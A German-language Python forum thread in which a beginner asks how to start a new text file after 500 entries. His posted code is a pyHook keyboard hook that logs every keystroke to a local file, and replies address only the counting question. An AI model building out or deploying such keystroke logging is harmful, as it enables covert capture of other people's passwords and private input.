txt file output zählen

Wenn du dir nicht sicher bist, in welchem der anderen Foren du die Frage stellen sollst, dann bist du hier im Forum für allgemeine Fragen sicher richtig.
Antworten
zar1
User
Beiträge: 39
Registriert: Samstag 28. Dezember 2013, 01:08

Hallo ich habe ein Programm geschrieben mit dem man über Python in eine text file schreiben kann und möchte nun, dass wenn zb die txtfile eine Länge von 500 elementen hat, zugemacht wird und eine neue textfile automatisch aufgemacht wird. Weiß jemand wie das geht ?
Sirius3
User
Beiträge: 17750
Registriert: Sonntag 21. Oktober 2012, 17:20

@zar1: ich würde vorschlagen, du zählst die Elemente und wenn Du 500 Elemente gezählt hast, dann machst Du die Datei zu und fängst eine neue an.
zar1
User
Beiträge: 39
Registriert: Samstag 28. Dezember 2013, 01:08

Wie zähl ich die denn ? geht das auch ohne while loop?
Hier ist mal der code vll könnt ihr den so verändern das,dass was ich mir wünsche funktioniert.

Code: Alles auswählen

def keyhook(event):


    f = open("_file_.txt","a") # w für write
  
    print ('Key:', event.Key)

    a = event.Key

    tw = f.write(a)
   

# return True to pass the event to other handlers
    return True

# create a hook manager
hm = pyHook.HookManager()
# watch for all mouse events
hm.KeyDown = keyhook

# set the hook
hm.HookKeyboard() 
Zuletzt geändert von Anonymous am Donnerstag 6. März 2014, 07:47, insgesamt 1-mal geändert.
Grund: Quelltext in Python-Code-Tags gesetzt.
EyDu
User
Beiträge: 4881
Registriert: Donnerstag 20. Juli 2006, 23:06
Wohnort: Berlin

Indem du einen Zähler anlegst und diesen bei jedem geschriebenem Element erhöhst.
Das Leben ist wie ein Tennisball.
zar1
User
Beiträge: 39
Registriert: Samstag 28. Dezember 2013, 01:08

kannst du mir das eben zeigen den das habe ich schon probiert aber ohne while loop krieg ich sowas nicht hin
Dami123
User
Beiträge: 225
Registriert: Samstag 23. Februar 2013, 13:01

Erstell eine Klasse definier die max. Zeilenanzahl und prüfe/erhöhe/resete diese bei Methodenaufruf.
zar1
User
Beiträge: 39
Registriert: Samstag 28. Dezember 2013, 01:08

okay also ich habs mal so probiert mit class kenne ich mich leider noch nciht so aus darum hat es auch nciht geklappt:

Code: Alles auswählen

class Obj(object):
  ids = count(0)
def keyhook(event):


    f = open("_file_.txt","a") # w für write
  
    print ('Key:', event.Key)

    a = event.Key.ids.next()

    tw = f.write(a)
   


    return True


hm = pyHook.HookManager()

hm.KeyDown = keyhook

hm.HookKeyboard()

pythoncom.PumpMessages() 
weiß jemand wo der fehler mit class legt bzw. wie man das macht
Zuletzt geändert von Anonymous am Donnerstag 6. März 2014, 07:48, insgesamt 1-mal geändert.
Grund: Quelltext in Python-Code-Tags gesetzt.
EyDu
User
Beiträge: 4881
Registriert: Donnerstag 20. Juli 2006, 23:06
Wohnort: Berlin

Programmieren funktioniert nicht durch Raten von Code. Dir fehlen ganz offensichtlich absolute Grundlagen. Tu dir selbst einen Gefallen und arbeite doch bitte zunächst das Tutorial gründlich durch. Sonst wirst du nie über einfachste Programm hinaus kommen.
Das Leben ist wie ein Tennisball.
Antworten